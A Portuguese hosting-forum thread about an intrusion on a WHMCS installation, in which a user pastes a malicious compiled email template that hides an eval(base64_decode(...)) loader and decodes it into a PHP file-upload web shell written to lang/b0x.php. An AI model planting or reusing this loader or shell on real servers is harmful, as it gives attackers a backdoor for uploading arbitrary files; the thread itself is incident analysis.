Ir para conteúdo
  • Cadastre-se

Tentativas de invasão em meu WHMCS


Posts Recomendados

Fiz essa atualização, no dia do lançamento.

Tenta fazer uma varredura com este script em seu servidor:

http://forum.portaldohost.com.br/threads/6793-Maldet-identifica%C3%A7%C3%A3o-de-malwares-no-servidor?p=61976#post61976

AtarWeb.com.br • Hospedagem de Site + SSL Grátis
█ Revenda de Hospedagem CPanel e DirectAdmin SSD + SSL Grátis
Link para o comentário
Compartilhar em outros sites

Pessoal,

Estava comparando o codigo com o postado pelo Edvan, e notei que é diferente.

O conteúdo do arquivo é este aqui:

<?php /* Smarty version 2.6.26, created on 2011-12-10 00:54:09

compiled from emailtpl:emailsubject */ ?>

[Ticket ID: 248848] <?php eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==')); ?>

Tirando a criptografia (se não estiver errado), tem o seguinte codigo:

m^r^$code = base64_decode('PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBHQUdBTCAhISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/PiA=');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

O curioso, é que o arquivo b0x.php não está na minha pasta lang, só tem os arquivos de linguagem normal.

E tirando esse trecho criptografado, tem este codigo:

m^r^<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>

Lembrando que o user que foi criado em meu whmcs é apiuser ou userapi (não lembro agora)

Eu procurei via shh o arquivo b0x.php no servidor e não foi encontrado.

AtarWeb.com.br • Hospedagem de Site + SSL Grátis
█ Revenda de Hospedagem CPanel e DirectAdmin SSD + SSL Grátis
Link para o comentário
Compartilhar em outros sites

Visitante
Este tópico está impedido de receber novos posts.
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?